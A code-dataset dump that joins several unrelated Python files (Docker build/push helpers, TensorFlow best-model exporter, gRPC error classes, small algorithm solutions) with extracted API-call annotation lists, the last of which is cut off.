] | [((451, 484), 'numpy.load', 'np.load', (["(part_path + '/betas.npy')"], {}), "(part_path + '/betas.npy')\n", (458, 484), True, 'import numpy as np\n'), ((499, 534), 'numpy.load', 'np.load', (["(part_path + '/fid_lst.npy')"], {}), "(part_path + '/fid_lst.npy')\n", (506, 534), True, 'import numpy as np\n'), ((5335, 5384), 'torch.norm', 'torch.norm', (['(rot_vecs + 1e-08)'], {'dim': '(1)', 'keepdim': '(True)'}), '(rot_vecs + 1e-08, dim=1, keepdim=True)\n', (5345, 5384), False, 'import torch\n'), ((5553, 5583), 'torch.split', 'torch.split', (['rot_dir', '(1)'], {'dim': '(1)'}), '(rot_dir, 1, dim=1)\n', (5564, 5583), False, 'import torch\n'), ((5592, 5651), 'torch.zeros', 'torch.zeros', (['(batch_size, 3, 3)'], {'dtype': 'dtype', 'device': 'device'}), '((batch_size, 3, 3), dtype=dtype, device=device)\n', (5603, 5651), False, 'import torch\n'), ((5665, 5721), 'torch.zeros', 'torch.zeros', (['(batch_size, 1)'], {'dtype': 'dtype', 'device': 'device'}), '((batch_size, 1), dtype=dtype, device=device)\n', (5676, 5721), False, 'import torch\n'), ((6042, 6064), 'numpy.argsort', 'np.argsort', (['id_sel_set'], {}), '(id_sel_set)\n', (6052, 6064), True, 'import numpy as np\n'), ((6080, 6099), 'numpy.argsort', 'np.argsort', (['req_ids'], {}), '(req_ids)\n', (6090, 6099), True, 'import numpy as np\n'), ((326, 359), 'numpy.load', 'np.load', (["(part_path + '/poses.npy')"], {}), "(part_path + '/poses.npy')\n", (333, 359), True, 'import numpy as np\n'), ((605, 617), 'json.load', 'json.load', (['f'], {}), '(f)\n', (614, 617), False, 'import json\n'), ((1302, 1340), 'numpy.load', 'np.load', (["(part_path + '/dev_orient.npy')"], {}), "(part_path + '/dev_orient.npy')\n", (1309, 1340), True, 'import numpy as np\n'), ((1361, 1398), 'numpy.load', 'np.load', (["(part_path + '/dev_trans.npy')"], {}), "(part_path + '/dev_trans.npy')\n", (1368, 1398), True, 'import numpy as np\n'), ((1494, 1522), 'torch.tensor', 'torch.tensor', (['poses[:, 0:32]'], {}), '(poses[:, 0:32])\n', (1506, 1522), False, 'import torch\n'), ((2018, 2042), 'numpy.array', 'np.array', (['pose_body_list'], {}), '(pose_body_list)\n', (2026, 2042), True, 'import numpy as np\n'), ((5442, 5458), 'torch.cos', 'torch.cos', (['angle'], {}), '(angle)\n', (5451, 5458), False, 'import torch\n'), ((5493, 5509), 'torch.sin', 'torch.sin', (['angle'], {}), '(angle)\n', (5502, 5509), False, 'import torch\n'), ((388, 427), 'numpy.load', 'np.load', (["(part_path + '/expressions.npy')"], {}), "(part_path + '/expressions.npy')\n", (395, 427), True, 'import numpy as np\n'), ((1754, 1766), 'numpy.zeros', 'np.zeros', (['(63)'], {}), '(63)\n', (1762, 1766), True, 'import numpy as np\n'), ((3505, 3537), 'os.path.join', 'osp.join', (['dp', 'f"""{fn_no_ext}.npy"""'], {}), "(dp, f'{fn_no_ext}.npy')\n", (3513, 3537), True, 'import os.path as osp\n'), ((5730, 5796), 'torch.cat', 'torch.cat', (['[zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros]'], {'dim': '(1)'}), '([zeros, -rz, ry, rz, zeros, -rx, -ry, rx, zeros], dim=1)\n', (5739, 5796), False, 'import torch\n'), ((5846, 5886), 'torch.eye', 'torch.eye', (['(3)'], {'dtype': 'dtype', 'device': 'device'}), '(3, dtype=dtype, device=device)\n', (5855, 5886), False, 'import torch\n'), ((5948, 5963), 'torch.bmm', 'torch.bmm', (['K', 'K'], {}), '(K, K)\n', (5957, 5963), False, 'import torch\n'), ((1854, 1886), 'cv2.Rodrigues', 'cv2.Rodrigues', (['pose_body_mats[i]'], {}), '(pose_body_mats[i])\n', (1867, 1886), False, 'import cv2\n'), ((3580, 3596), 'numpy.load', 'np.load', (['load_fp'], {}), '(load_fp)\n', (3587, 3596), True, 'import numpy as np\n'), ((3903, 3948), 'human_body_prior.tools.model_loader.load_vposer', 'load_vposer', (['vposer_ckpt'], {'vp_model': '"""snapshot"""'}), "(vposer_ckpt, vp_model='snapshot')\n", (3914, 3948), False, 'from human_body_prior.tools.model_loader import load_vposer\n'), ((4018, 4047), 'torch.tensor', 'torch.tensor', (['loaded[:, 0:32]'], {}), '(loaded[:, 0:32])\n', (4030, 4047), False, 'import torch\n'), ((4267, 4306), 'numpy.zeros', 'np.zeros', (['(pose_body_mats.shape[0], 63)'], {}), '((pose_body_mats.shape[0], 63))\n', (4275, 4306), True, 'import numpy as np\n'), ((2546, 2568), 'cv2.Rodrigues', 'cv2.Rodrigues', (['rot_mat'], {}), '(rot_mat)\n', (2559, 2568), False, 'import cv2\n'), ((4482, 4517), 'cv2.Rodrigues', 'cv2.Rodrigues', (['pose_body_mats[i, j]'], {}), '(pose_body_mats[i, j])\n', (4495, 4517), False, 'import cv2\n')] |
import docker
from dockerfile_generator import render
import os
import json
from tqdm import tqdm
from typing import Union, Any, Optional
def build_image(repo_url: str, tag: str, path: str) -> None:
"""
build_image builds the image with the given tag
"""
client = docker.from_env()
print(f"Building image: {tag}")
client.images.build(tag=tag, path=path)
print("Successfully built image!")
def push_image(tag: str) -> None:
"""
push_image pushes the given tag. It uses
the current docker environment
"""
client = docker.from_env()
print(f"Pushing image: {tag}")
with tqdm(total=100, ascii=False) as progress_bar:
last_percent = 0.0
for line in client.images.push(tag, stream=True):
percent = get_completion_percentage(line)
if percent:
progress_bar.update(percent - last_percent)
last_percent = percent
def retag_image(
old_repo_url: str,
new_repo_url: str,
old_tag: str,
new_tag: str,
path: str,
labels: Optional[dict] = None,
username: Optional[str] = None,
password: Optional[str] = None,
registry: Optional[str] = None,
) -> None:
with open(f"{path}/Dockerfile", "w") as f:
f.write(f"FROM {old_repo_url}:{old_tag}")
client = docker.from_env()
if all(value is not None for value in [username, password, registry]):
client.login(username=username, password=password, registry=registry)
image, _ = client.images.build(path=f"{path}", labels=labels, tag=new_tag)
image.tag(new_repo_url, new_tag)
os.remove(f"{path}/Dockerfile")
# We do not want to republish an image that has not changed, so we check if the new
# pair repo:tag already exists.
try:
image = client.images.pull(new_repo_url, new_tag)
return
# We also need to catch APIError as if the image has been recently deleted (uncommon, but might happen?)
# we will get this kind of error:
# docker.errors.APIError: 500 Server Error: Internal Server Error
# ("unknown: Tag <tag> was deleted or has expired. To pull, revive via time machine"
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
pass
print(f"Pushing to {new_repo_url}:{new_tag}")
client.images.push(new_repo_url, new_tag)
def get_completion_percentage(line: Any) -> float:
try:
line = json.loads(line.strip().decode("utf-8"))
except ValueError:
return 0
to_skip = ("Preparing", "Waiting", "Layer already exists")
if "status" in line:
if line["status"] in to_skip:
return 0
if line["status"] == "Pushing":
try:
current = float(line["progressDetail"]["current"])
total = float(line["progressDetail"]["total"])
except KeyError:
return 0
result = (current / total) * 100
if result > 100.0:
return 100.0
return result
return 0
def build_and_push_image(repo_url: str, tag: str, path: str, image_type: str) -> None:
"""
build_and_push_operator creates the Dockerfile for the operator
and pushes it to the target repo
"""
dockerfile_text = render(image_type, ["."])
with open(f"{path}/Dockerfile", "w") as f:
f.write(dockerfile_text)
build_image(repo_url, tag, path)
os.remove(f"{path}/Dockerfile")
push_image(tag)
| [
"dockerfile_generator.render",
"docker.from_env",
"tqdm.tqdm",
"os.remove"
] | [((283, 300), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (298, 300), False, 'import docker\n'), ((565, 582), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (580, 582), False, 'import docker\n'), ((1315, 1332), 'docker.from_env', 'docker.from_env', ([], {}), '()\n', (1330, 1332), False, 'import docker\n'), ((1607, 1638), 'os.remove', 'os.remove', (['f"""{path}/Dockerfile"""'], {}), "(f'{path}/Dockerfile')\n", (1616, 1638), False, 'import os\n'), ((3255, 3280), 'dockerfile_generator.render', 'render', (['image_type', "['.']"], {}), "(image_type, ['.'])\n", (3261, 3280), False, 'from dockerfile_generator import render\n'), ((3403, 3434), 'os.remove', 'os.remove', (['f"""{path}/Dockerfile"""'], {}), "(f'{path}/Dockerfile')\n", (3412, 3434), False, 'import os\n'), ((627, 655), 'tqdm.tqdm', 'tqdm', ([], {'total': '(100)', 'ascii': '(False)'}), '(total=100, ascii=False)\n', (631, 655), False, 'from tqdm import tqdm\n')] |
import io
grid = {}
y = 0
x = 0
for l in io.open("day22.in").read().splitlines():
for x in range(len(l)):
grid[(y,x)] = l[x]
y += 1
y = y // 2
x = x // 2
dx = 0
dy = -1
r = 0
for iter in range(10000000):
if (y,x) not in grid or grid[(y,x)] == '.':
(dy, dx) = (-dx, dy)
grid[(y,x)] = 'W'
elif grid[(y,x)] == 'W':
grid[(y,x)] = '#'
r += 1
elif grid[(y,x)] == '#':
(dy, dx) = (dx, -dy)
grid[(y,x)] = 'F'
elif grid[(y,x)] == 'F':
(dy, dx) = (-dy, -dx)
grid[(y,x)] = '.'
y += dy
x += dx
print(r) | [
"io.open"
] | [((42, 61), 'io.open', 'io.open', (['"""day22.in"""'], {}), "('day22.in')\n", (49, 61), False, 'import io\n')] |
from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
from functools import wraps
_COMPLEX_PLOTTING_ERROR_MSG = """
Complex fields cannot be plotted. Use operators to get the amplitude
or the result at a defined sweeping phase before plotting.
"""
_FIELD_CONTAINER_PLOTTING_MSG = """"
This fields_container contains multiple fields. Only one time-step
result can be plotted at a time. Extract a field with
``fields_container[index]``.
"""
class DpfVersionNotSupported(RuntimeError):
"""Error raised when the dpf-core/grpc-dpf python features are not
supported by the DPF gRPC server version."""
def __init__(self, version, msg=None):
if msg is None:
msg = "Feature not supported. Upgrade the server to "
msg += str(version)
msg += " version (or above)."
RuntimeError.__init__(self, msg)
class DpfValueError(ValueError):
"""Error raised when a specific DPF error value must be defined."""
def __init__(
self, msg="A value that has been set leads to incorrect DPF behavior."
):
ValueError.__init__(self, msg)
class InvalidTypeError(ValueError):
"""Error raised when a parameter has the wrong type."""
def __init__(self, data_type, parameter_name):
msg = (
"A "
+ data_type
+ " must be used for the following parameter: "
+ parameter_name
+ "."
)
ValueError.__init__(self, msg)
class LocationError(ValueError):
"""Error raised when using an invalid location."""
def __init__(self, msg="Invalid location"):
ValueError.__init__(self, msg)
class ComplexPlottingError(ValueError):
"""Error raised when attempting to plot a field with complex data."""
def __init__(self, msg=_COMPLEX_PLOTTING_ERROR_MSG):
ValueError.__init__(self, msg)
class FieldContainerPlottingError(ValueError):
"""Error raised when attempting to plot a fields_container containing
multiple fields."""
def __init__(self, msg=_FIELD_CONTAINER_PLOTTING_MSG):
ValueError.__init__(self, msg)
class InvalidANSYSVersionError(RuntimeError):
"""Error raised when the Ansys verion is invalid."""
def __init__(self, msg=""):
RuntimeError.__init__(self, msg)
class DPFServerException(Exception):
"""Error raised when the DPF server has encountered an error."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class DPFServerNullObject(Exception):
"""Error raised when the DPF server cannot find an object."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class InvalidPortError(OSError):
"""Error raised when used an invalid port when starting DPF."""
def __init__(self, msg=""):
OSError.__init__(self, msg)
def protect_grpc(func):
"""Capture gRPC exceptions and return a more succinct error message."""
@wraps(func)
def wrapper(*args, **kwargs):
"""Capture gRPC exceptions."""
# Capture gRPC exceptions
try:
out = func(*args, **kwargs)
except (_InactiveRpcError, _MultiThreadedRendezvous) as error:
details = error.details()
if "object is null in the dataBase" in details:
raise DPFServerNullObject(details) from None
raise DPFServerException(details) from None
return out
return wrapper
| [
"functools.wraps"
] | [((2939, 2950), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (2944, 2950), False, 'from functools import wraps\n')] |
from dataclasses import dataclass
from dataclasses import field
from time import time
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
@dataclass
class NewUser:
"""Deals with the commands the user is currently sending"""
user_id: int
chat_id: int
command: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=}"
@dataclass
class UserCommand:
"""Stores the latest command sent by the user"""
user_id: int
command: str
insert_time: int = int(time()) # for garbage collection
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=} {self.insert_time=}"
@dataclass
class MessageInfo:
"""Important things in the message"""
user_id: int
chat_id: int
message_id: int
text: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.chat_id=} {self.message_id=} {self.text=}"
@dataclass
class UserDBInfo:
"""Info about the user from the DB"""
feed: bool # if false, the bot will not send any news feeds on a daily basis
user_id: int
db_id: int
topics: List[str] = field(default_factory=lambda: [])
def __repr__(self) -> str:
return f"{self.user_id=} {self.feed=} {self.db_id=} {self.topics=}"
@dataclass
class StagedFunction:
"""For FunctionStagingArea"""
fn: Callable[..., Any]
args: Optional[Tuple[Any, ...]] = None
kwargs: Optional[Dict[str, Any]] = None
| [
"time.time",
"dataclasses.field"
] | [((1216, 1250), 'dataclasses.field', 'field', ([], {'default_factory': '(lambda : [])'}), '(default_factory=lambda : [])\n', (1221, 1250), False, 'from dataclasses import field\n'), ((612, 618), 'time.time', 'time', ([], {}), '()\n', (616, 618), False, 'from time import time\n')] |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from setuptools import setup
with open("README.md") as f:
readme = f.read()
setup(
name="dpr",
version="0.1.0",
description="Facebook AI Research Open Domain Q&A Toolkit",
url="https://github.com/facebookresearch/DPR/",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
long_description=readme,
long_description_content_type="text/markdown",
setup_requires=[
"setuptools>=18.0",
],
install_requires=[
"cython",
"faiss-cpu>=1.6.1",
"filelock",
"numpy",
"regex",
"torch>=1.2.0",
"transformers>=3.0.0,<3.1.0",
"tqdm>=4.27",
"wget",
"spacy>=2.1.8",
],
)
| [
"setuptools.setup"
] | [((284, 941), 'setuptools.setup', 'setup', ([], {'name': '"""dpr"""', 'version': '"""0.1.0"""', 'description': '"""Facebook AI Research Open Domain Q&A Toolkit"""', 'url': '"""https://github.com/facebookresearch/DPR/"""', 'classifiers': "['Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence']", 'long_description': 'readme', 'long_description_content_type': '"""text/markdown"""', 'setup_requires': "['setuptools>=18.0']", 'install_requires': "['cython', 'faiss-cpu>=1.6.1', 'filelock', 'numpy', 'regex', 'torch>=1.2.0',\n 'transformers>=3.0.0,<3.1.0', 'tqdm>=4.27', 'wget', 'spacy>=2.1.8']"}), "(name='dpr', version='0.1.0', description=\n 'Facebook AI Research Open Domain Q&A Toolkit', url=\n 'https://github.com/facebookresearch/DPR/', classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence'],\n long_description=readme, long_description_content_type='text/markdown',\n setup_requires=['setuptools>=18.0'], install_requires=['cython',\n 'faiss-cpu>=1.6.1', 'filelock', 'numpy', 'regex', 'torch>=1.2.0',\n 'transformers>=3.0.0,<3.1.0', 'tqdm>=4.27', 'wget', 'spacy>=2.1.8'])\n", (289, 941), False, 'from setuptools import setup\n')] |
# encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: <EMAIL>
@site:
@software: PyCharm
@time: 2019/9/12 20:37
"""
from pprint import pprint as pp
from operator import itemgetter
import time
from collections import OrderedDict
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_85
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_86
class Solution:
"""
输入:[[4,10,15,24,26], [0,9,12,20], [5,18,22,30]]
输出: [20,24]
"""
def smallestRange(self, nums):
start_time = time.time()
k = len(nums)
print('k-->', k)
k_tagged_merged_list = []
for i in range(k):
row = nums[i]
k_tagged_merged_list.extend([(e, i) for e in row])
k_tagged_merged_list.sort(key=itemgetter(0))
sort_end_time = time.time()
print('sorting time:', sort_end_time - start_time)
# print(k_tagged_merged_list)
od = OrderedDict()
min_range = None
min_range_len = int(2e5)
# print('min_range_len', min_range_len)
tot_len = len(k_tagged_merged_list)
# print('tot_len', tot_len)
i = 0
while i < tot_len:
this_tag = k_tagged_merged_list[i][1]
cur_tag_set = od.keys()
if this_tag in cur_tag_set:
od.pop(this_tag)
od[this_tag] = k_tagged_merged_list[i][0]
tags = od.keys()
# print('len_k_dque-->', len(k_dque))
# print('len_k_dque_tags-->', len(k_dque_tags))
if len(tags) == k:
keys = list(od.keys())
first_v = od[keys[0]]
last_v = od[keys[-1]]
k_range_len = last_v - first_v
if k_range_len < min_range_len:
min_range_len = k_range_len
min_range = first_v, last_v
i += 1
print('ending main time:', time.time() - sort_end_time)
return min_range
if __name__ == '__main__':
s = Solution()
nums = [[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]
# nums = [[10], [11]]
# nums = [[11,38,83,
# 84,84,85,88,89,89,92],[28,61,89],[52,77,79,80,81],[21,25,26,26,26,27],[9,83,85,90],[84,85,87],[26,68,70,71],[36,40,41,42,45],[-34,21],[-28,-28,-23,1,13,21,28,37,37,38],[-74,1,2,22,33,35,43,45],[54,96,98,98,99],[43,54,60,65,71,75],[43,46],[50,50,58,67,69],[7,14,15],[78,80,89,89,90],[35,47,63,69,77,92,94]]
# [-74, 1, 2, 22, 33, 35, 43, 45], [54, 96, 98, 98, 99], [43, 54, 60, 65, 71, 75], [43, 46],
# [50, 50, 58, 67, 69], [7, 14, 15], [78, 80, 89, 89, 90], [35, 47, 63, 69, 77, 92, 94]]
nums = BIG_LIST_85
# nums = BIG_LIST_86
min_range = s.smallestRange(nums)
print(min_range)
| [
"operator.itemgetter",
"collections.OrderedDict",
"time.time"
] | [((555, 566), 'time.time', 'time.time', ([], {}), '()\n', (564, 566), False, 'import time\n'), ((842, 853), 'time.time', 'time.time', ([], {}), '()\n', (851, 853), False, 'import time\n'), ((965, 978), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (976, 978), False, 'from collections import OrderedDict\n'), ((803, 816), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (813, 816), False, 'from operator import itemgetter\n'), ((1956, 1967), 'time.time', 'time.time', ([], {}), '()\n', (1965, 1967), False, 'import time\n')] |
import numpy as np
def smooth(a, WSZ):
# a: NumPy 1-D array containing the data to be smoothed
# WSZ: smoothing window size needs, which must be odd number,
# as in the original MATLAB implementation
if WSZ % 2 == 0:
WSZ = WSZ - 1
out0 = np.convolve(a, np.ones(WSZ, dtype=int), 'valid') / WSZ
r = np.arange(1, WSZ - 1, 2)
start = np.cumsum(a[:WSZ - 1])[::2] / r
stop = (np.cumsum(a[:-WSZ:-1])[::2] / r)[::-1]
return np.concatenate((start, out0, stop))
| [
"numpy.concatenate",
"numpy.cumsum",
"numpy.ones",
"numpy.arange"
] | [((331, 355), 'numpy.arange', 'np.arange', (['(1)', '(WSZ - 1)', '(2)'], {}), '(1, WSZ - 1, 2)\n', (340, 355), True, 'import numpy as np\n'), ((462, 497), 'numpy.concatenate', 'np.concatenate', (['(start, out0, stop)'], {}), '((start, out0, stop))\n', (476, 497), True, 'import numpy as np\n'), ((283, 306), 'numpy.ones', 'np.ones', (['WSZ'], {'dtype': 'int'}), '(WSZ, dtype=int)\n', (290, 306), True, 'import numpy as np\n'), ((368, 390), 'numpy.cumsum', 'np.cumsum', (['a[:WSZ - 1]'], {}), '(a[:WSZ - 1])\n', (377, 390), True, 'import numpy as np\n'), ((412, 434), 'numpy.cumsum', 'np.cumsum', (['a[:-WSZ:-1]'], {}), '(a[:-WSZ:-1])\n', (421, 434), True, 'import numpy as np\n')] |
from __future__ import absolute_import
import abc
import os
import json
import glob
import shutil
from tensorflow.python.estimator import gc
from tensorflow.python.estimator import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.framework import errors_impl
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter
def _verify_compare_fn_args(compare_fn):
"""Verifies compare_fn arguments."""
args = set(util.fn_args(compare_fn))
if 'best_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include best_eval_result argument.' % compare_fn)
if 'current_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include current_eval_result argument.' %
compare_fn)
non_valid_args = list(args - set(['best_eval_result', 'current_eval_result']))
if non_valid_args:
raise ValueError('compare_fn (%s) has following not expected args: %s' %
(compare_fn, non_valid_args))
def _loss_smaller(best_eval_result, current_eval_result):
"""Compares two evaluation results and returns true if the 2nd one is smaller.
Both evaluation results should have the values for MetricKeys.LOSS, which are
used for comparison.
Args:
best_eval_result: best eval metrics.
current_eval_result: current eval metrics.
Returns:
True if the loss of current_eval_result is smaller; otherwise, False.
Raises:
ValueError: If input eval result is None or no loss is available.
"""
default_key = metric_keys.MetricKeys.LOSS
if not best_eval_result or default_key not in best_eval_result:
raise ValueError(
'best_eval_result cannot be empty or no loss is found in it.')
if not current_eval_result or default_key not in current_eval_result:
raise ValueError(
'current_eval_result cannot be empty or no loss is found in it.')
return best_eval_result[default_key] > current_eval_result[default_key]
class BestExporter(Exporter):
"""This class exports the serving graph and checkpoints of the best models.
This class performs a model export everytime when the new model is better
than any exsiting model.
"""
def __init__(self,
name='best_exporter',
serving_input_receiver_fn=None,
event_file_pattern='eval/*.tfevents.*',
compare_fn=_loss_smaller,
assets_extra=None,
as_text=False,
exports_to_keep=5):
"""Create an `Exporter` to use with `tf.estimator.EvalSpec`.
Example of creating a BestExporter for training and evluation:
```python
def make_train_and_eval_fn():
# Set up feature columns.
categorial_feature_a = (
tf.feature_column.categorical_column_with_hash_bucket(...))
categorial_feature_a_emb = embedding_column(
categorical_column=categorial_feature_a, ...)
... # other feature columns
estimator = tf.estimator.DNNClassifier(
config=tf.estimator.RunConfig(
model_dir='/my_model', save_summary_steps=100),
feature_columns=[categorial_feature_a_emb, ...],
hidden_units=[1024, 512, 256])
serving_feature_spec = tf.feature_column.make_parse_example_spec(
categorial_feature_a_emb)
serving_input_receiver_fn = (
tf.estimator.export.build_parsing_serving_input_receiver_fn(
serving_feature_spec))
exporter = tf.estimator.BestExporter(
name="best_exporter",
serving_input_receiver_fn=serving_input_receiver_fn,
exports_to_keep=5)
train_spec = tf.estimator.TrainSpec(...)
eval_spec = [tf.estimator.EvalSpec(
input_fn=eval_input_fn,
steps=100,
exporters=exporter,
start_delay_secs=0,
throttle_secs=5)]
return tf.estimator.DistributedTrainingSpec(estimator, train_spec,
eval_spec)
```
Args:
name: unique name of this `Exporter` that is going to be used in the
export path.
serving_input_receiver_fn: a function that takes no arguments and returns
a `ServingInputReceiver`.
event_file_pattern: event file name pattern relative to model_dir. If
None, however, the exporter would not be preemption-safe. To bex
preemption-safe, event_file_pattern should be specified.
compare_fn: a function that compares two evaluation results and returns
true if current evaluation result is better. Follows the signature:
* Args:
* `best_eval_result`: This is the evaluation result of the best model.
* `current_eval_result`: This is the evaluation result of current
candidate model.
* Returns:
True if current evaluation result is better; otherwise, False.
assets_extra: An optional dict specifying how to populate the assets.extra
directory within the exported SavedModel. Each key should give the
destination path (including the filename) relative to the assets.extra
directory. The corresponding value gives the full path of the source
file to be copied. For example, the simple case of copying a single
file without renaming it is specified as `{'my_asset_file.txt':
'/path/to/my_asset_file.txt'}`.
as_text: whether to write the SavedModel proto in text format. Defaults to
`False`.
exports_to_keep: Number of exports to keep. Older exports will be
garbage-collected. Defaults to 5. Set to `None` to disable garbage
collection.
Raises:
ValueError: if any arguments is invalid.
"""
self._compare_fn = compare_fn
if self._compare_fn is None:
raise ValueError('`compare_fn` must not be None.')
_verify_compare_fn_args(self._compare_fn)
self._saved_model_exporter = _SavedModelExporter(
name, serving_input_receiver_fn, assets_extra, as_text)
self._event_file_pattern = event_file_pattern
self._model_dir = None
self._best_eval_result = None
self._exports_to_keep = exports_to_keep
self._log = {}
if exports_to_keep is not None and exports_to_keep <= 0:
raise ValueError(
'`exports_to_keep`, if provided, must be positive number')
@property
def name(self):
return self._saved_model_exporter.name
def export(self, estimator, export_path, checkpoint_path, eval_result,
is_the_final_export):
export_result = None
if self._model_dir != estimator.model_dir and self._event_file_pattern:
# Loads best metric from event files.
tf_logging.info('Loading best metric from event files.')
self._model_dir = estimator.model_dir
full_event_file_pattern = os.path.join(self._model_dir,
self._event_file_pattern)
self._best_eval_result = self._get_best_eval_result(
full_event_file_pattern)
if os.path.isfile(os.path.join(export_path, 'export.log')):
self._log = {}
try:
self._log = json.load(open(os.path.join(export_path, 'export.log'), 'r'))
except json.JSONDecodeError:
pass
if len(self._log) == 0:
self._best_eval_result = None
if self._best_eval_result is None or self._compare_fn(
best_eval_result=self._best_eval_result,
current_eval_result=eval_result):
tf_logging.info('Performing best model export.')
self._best_eval_result = eval_result
export_result = self._saved_model_exporter.export(
estimator, export_path, checkpoint_path, eval_result,
is_the_final_export)
export_result_path = export_result.decode("utf-8")
self._log[export_result_path] = {k: float(v) for k, v in eval_result.items()}
self._copy_checkpoint(checkpoint_path, export_result_path, eval_result["global_step"])
self._garbage_collect_exports(export_path)
with open(os.path.join(export_path, 'export.log'), 'w') as fp:
json.dump(self._log, fp)
return export_result
def _copy_checkpoint(self, checkpoint_pattern, dest_path, step):
for file in glob.glob(checkpoint_pattern + '*'):
shutil.copy(file, dest_path)
with open(os.path.join(dest_path, 'checkpoint'), 'w') as fp:
text = 'model_checkpoint_path: "model.ckpt-number"\n'.replace('number', str(step))
fp.write(text)
fp.close()
def _garbage_collect_exports(self, export_dir_base):
"""Deletes older exports, retaining only a given number of the most recent.
Export subdirectories are assumed to be named with monotonically increasing
integers; the most recent are taken to be those with the largest values.
Args:
export_dir_base: the base directory under which each export is in a
versioned subdirectory.
"""
if self._exports_to_keep is None:
return
def _export_version_parser(path):
# create a simple parser that pulls the export_version from the directory.
filename = os.path.basename(path.path)
if not (len(filename) == 10 and filename.isdigit()):
return None
return path._replace(export_version=int(filename))
# pylint: disable=protected-access
keep_filter = gc._largest_export_versions(self._exports_to_keep)
delete_filter = gc._negation(keep_filter)
for p in delete_filter(
gc._get_paths(export_dir_base, parser=_export_version_parser)):
try:
del self._log[p.path]
gfile.DeleteRecursively(p.path)
except errors_impl.NotFoundError as e:
tf_logging.warn('Can not delete %s recursively: %s', p.path, e)
# pylint: enable=protected-access
def _get_best_eval_result(self, event_files):
"""Get the best eval result from event files.
Args:
event_files: Absolute pattern of event files.
Returns:
The best eval result.
"""
if not event_files:
return None
event_count = 0
best_eval_result = None
for event_file in gfile.Glob(os.path.join(event_files)):
for event in summary_iterator.summary_iterator(event_file):
if event.HasField('summary'):
event_eval_result = {}
for value in event.summary.value:
if value.HasField('simple_value'):
event_eval_result[value.tag] = value.simple_value
if event_eval_result:
if best_eval_result is None or self._compare_fn(
best_eval_result, event_eval_result):
event_count += 1
best_eval_result = event_eval_result
if event_count < 2:
return None
return best_eval_result
| [
"tensorflow.python.estimator.gc._largest_export_versions",
"tensorflow.python.platform.gfile.DeleteRecursively",
"json.dump",
"os.path.join",
"tensorflow.python.summary.summary_iterator.summary_iterator",
"tensorflow.python.platform.tf_logging.warn",
"tensorflow.python.platform.tf_logging.info",
"tensorflow.python.estimator.gc._negation",
"shutil.copy",
"tensorflow.python.estimator.exporter._SavedModelExporter",
"os.path.basename",
"tensorflow.python.estimator.gc._get_paths",
"tensorflow.python.estimator.util.fn_args",
"glob.glob"
] | [((627, 651), 'tensorflow.python.estimator.util.fn_args', 'util.fn_args', (['compare_fn'], {}), '(compare_fn)\n', (639, 651), False, 'from tensorflow.python.estimator import util\n'), ((6454, 6529), 'tensorflow.python.estimator.exporter._SavedModelExporter', '_SavedModelExporter', (['name', 'serving_input_receiver_fn', 'assets_extra', 'as_text'], {}), '(name, serving_input_receiver_fn, assets_extra, as_text)\n', (6473, 6529), False, 'from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter\n'), ((8977, 9012), 'glob.glob', 'glob.glob', (["(checkpoint_pattern + '*')"], {}), "(checkpoint_pattern + '*')\n", (8986, 9012), False, 'import glob\n'), ((10180, 10230), 'tensorflow.python.estimator.gc._largest_export_versions', 'gc._largest_export_versions', (['self._exports_to_keep'], {}), '(self._exports_to_keep)\n', (10207, 10230), False, 'from tensorflow.python.estimator import gc\n'), ((10255, 10280), 'tensorflow.python.estimator.gc._negation', 'gc._negation', (['keep_filter'], {}), '(keep_filter)\n', (10267, 10280), False, 'from tensorflow.python.estimator import gc\n'), ((7276, 7332), 'tensorflow.python.platform.tf_logging.info', 'tf_logging.info', (['"""Loading best metric from event files."""'], {}), "('Loading best metric from event files.')\n", (7291, 7332), False, 'from tensorflow.python.platform import tf_logging\n'), ((7422, 7477), 'os.path.join', 'os.path.join', (['self._model_dir', 'self._event_file_pattern'], {}), '(self._model_dir, self._event_file_pattern)\n', (7434, 7477), False, 'import os\n'), ((7661, 7700), 'os.path.join', 'os.path.join', (['export_path', '"""export.log"""'], {}), "(export_path, 'export.log')\n", (7673, 7700), False, 'import os\n'), ((8164, 8212), 'tensorflow.python.platform.tf_logging.info', 'tf_logging.info', (['"""Performing best model export."""'], {}), "('Performing best model export.')\n", (8179, 8212), False, 'from tensorflow.python.platform import tf_logging\n'), ((9026, 9054), 'shutil.copy', 'shutil.copy', (['file', 'dest_path'], {}), '(file, dest_path)\n', (9037, 9054), False, 'import shutil\n'), ((9930, 9957), 'os.path.basename', 